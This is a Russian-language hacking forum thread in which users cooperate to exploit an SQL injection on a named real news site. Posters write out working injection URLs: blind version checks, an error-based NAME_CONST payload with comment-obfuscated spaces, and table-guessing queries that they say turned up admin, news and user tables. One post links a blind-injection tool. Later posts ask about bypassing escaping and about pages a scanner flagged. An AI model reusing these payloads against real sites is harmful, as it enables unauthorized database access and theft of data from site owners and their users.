http://podium.md/news_show.php?id=33' доброе время суток уважаемые ачатовцы, хочу попросить помощи в раскрутке скули данного ресурса, либо я очень устал и уперся в банальность либо проблема в самом ресурсе.Заранее благодарен.
2Gorev раскручивай как блинд http://podium.md/news_show.php?id=33+and+substring(version(),1,1)=5 думаю нормального вывода не добиться
Code: http://podium.md/news_show.php?id=33/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a) пробуй крутить как блинд
2[x60]unu где там таблы? Code: http://podium.md/news_show.php?id=33+and+(select+name_const((select+1),1)) Incorrect arguments to NAME_CONST этот способ в данном случае не прокатит для вывода таблиц и тп.
http://podium.md/news_show.php?id=33+AND+1=(SELECT+1+FROM+admin+LIMIT+0,1)-- методом тыка угадал таблы admin,news,user
попробуй эту софтиу для слепых иньекций www.darkc0de.com/others/blindext.py тама дето и хелп к ней лежал
Подскажите пожалуйста, можно ли как то обойти следующее в SQL Select a from DB-nomer1.user - примерный запрос Проблема в экранировании тере "-" и в итоге получаю ошибку Какие есть возможности?
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35 И что с ней можно сделать?И что он выдал, вроде обычная страница!
Есть действенный способ! Прочесть статью и удалить с компьютера сканер! Статья - http://forum.antichat.ru/threadnav43966-1-40.html Сканер - rmb -> delete
